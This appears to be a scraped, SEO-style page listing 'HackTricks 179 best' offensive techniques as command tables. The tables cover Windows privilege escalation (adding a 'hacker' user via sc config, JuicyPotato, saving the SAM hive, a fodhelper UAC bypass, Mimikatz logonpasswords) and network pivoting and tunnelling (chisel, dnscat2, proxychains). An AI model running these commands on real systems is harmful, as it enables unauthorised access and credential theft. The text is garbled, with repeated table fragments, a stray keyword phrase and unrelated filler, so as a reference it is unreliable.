| # | Trick | Command / Technique | |---|-------|----------------------| | 31 | AlwaysInstallElevated MSI | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer | | 32 | Unquoted service paths | wmic service get name,displayname,pathname,startmode | | 33 | Weak service permissions (sc.exe) | sc config SERVICE binpath="cmd.exe /c net user hacker pass /add" | | 34 | SeImpersonate (Potato家族) | JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" | | 35 | Saved RDP credentials | cmdkey /list → runas /savecred | | 36 | SAM & SYSTEM backup | reg save hklm\sam sam.save | | 37 | Writable %PATH% folders | where.exe check + drop whoami.exe | | 38 | PrintNightmare (CVE-2021-34527) | MS-RPRN → SharpPrintNightmare.exe | | 39 | UAC bypass – fodhelper | reg add HKCU\Software\Classes\ms-settings\shell\open\command | | 40 | Logon scripts from registry | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" | | ... | ... | ... | | 60 | Mimikatz sekurlsa | sekurlsa::logonpasswords |
So, what makes the cut? According to aggregated community rankings, the "HackTricks 179 best" techniques fall into four critical categories. Below is a breakdown of the top sections you must memorize. hacktricks 179 best
: Many platforms like Hacktricks have community forums or discussion boards. You can post a question about your specific topic to see if other users or experts can provide guidance or point you in the right direction. | # | Trick | Command / Technique
| # | Trick | Command | |---|-------|---------| | 126 | SSH dynamic port forward | ssh -D 1080 user@target | | 127 | Chisel SOCKS5 | chisel client server:8000 socks | | 128 | Ligolo-ng tunnel | ligolo-proxy -selfcert | | 129 | Plink (Windows SSH) | plink.exe -ssh -R 1080 | | 130 | ICMP tunneling | ptunnel -p target -lp 8000 | | 131 | DNS tunneling (dnscat2) | dnscat2-server domain.com | | ... | ... | ... | | 140 | Proxychains + nmap | proxychains nmap -sT -Pn 10.0.0.1 | | | 60 | Mimikatz sekurlsa | sekurlsa::logonpasswords
Cloud workload identity misconfig (Azure Managed Identities) - Abuse misconfigured identities to access other resources.